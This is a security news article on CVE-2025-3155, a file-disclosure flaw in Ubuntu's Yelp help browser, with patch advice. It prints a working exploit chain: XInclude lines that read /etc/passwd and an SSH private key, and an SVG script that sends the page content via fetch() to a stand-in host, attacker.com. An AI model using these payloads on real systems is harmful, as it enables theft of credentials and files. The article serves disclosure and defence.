Security researchers have uncovered a critical vulnerability (CVE-2025-3155) in Ubuntu’s default help browser Yelp that could expose sensitive system files including SSH private keys.
The flaw impacts Ubuntu desktop installations and stems from improper handling of XML content in GNOME’s help documentation system.
Affected Systems:
Vulnerability Chain:
<include href="/etc/passwd" xmlns="http://www.w3.org/2001/XInclude"/>
<svg:script>onload=_=>fetch("http://attacker.com", {body:document.body})</svg:script>
Attack Scenario Walkthrough
Key Exploit Code Snippet:
<script>
let payloadPage = `<?xml...>
<include href="/proc/self/cwd/.ssh/id_rsa"/>
<svg:script>onload=_=>fetch("http://attacker.com",...)</svg:script>`;
function exp() {
const blob = new Blob([payloadPage], {type: 'text/plain'});
const a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'index.page';
a.click();
location = 'ghelp:///proc/self/cwd/Downloads';
}
</script>
Canonical has released patches in Ubuntu security updates dated April 7, 2025. Users are urged to apply updates immediately through standard package channels.
This vulnerability demonstrates three critical risks:
Security researcher noted: “This chain shows how apparently harmless documentation tools can become attack vectors when combined with modern web technologies. The ghelp:// handler’s file inclusion capabilities create unexpected trust boundaries.”
Ongoing investigations continue to determine if this vulnerability was exploited in wild. Users and enterprises are advised to audit SSH key usage and monitor for suspicious authentication attempts.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
The BPFDoor malware has emerged as a significant threat targeting domestic and international organizations, particularly…
As artificial intelligence continues to reshape the technological landscape, tools like Snowflake’s CORTEX Search Service…
UNC3944, a financially-motivated threat actor also linked to the group known as Scattered Spider, has…
Cybersecurity researcher has uncovered a massive malware campaign targeting MacOS users through approximately 2,800 compromised…
Cybersecurity researchers have uncovered a critical flaw in the content moderation systems of AI models…
Microsoft’s cybersecurity research team has issued a stark warning about the risks of using default…